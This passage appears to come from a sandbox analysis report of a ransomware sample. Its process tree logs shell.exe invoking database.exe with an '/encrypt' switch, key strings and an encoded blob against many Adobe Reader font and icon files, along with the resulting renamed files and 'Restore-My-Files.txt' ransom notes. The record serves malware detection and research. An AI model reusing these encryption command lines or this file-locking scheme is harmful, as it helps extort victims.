                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:2280
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                          PID:5104
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                          PID:5516
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                                                                                                          PID:1896
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:5316
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:1872
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:4560
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:1660
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:1408
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                      PID:5996
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZX______.PFB.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                        PID:920
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                          PID:2572
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                            PID:3240
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                              PID:984
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                PID:4304
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                  PID:2284
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\APIFile_8.ico.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:5564
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:5328
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:6092
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 248
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                                                                                          PID:7372
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Shell.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\Shell.exe"
                                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                                            PID:7376
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDXFile_8.ico.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:4808
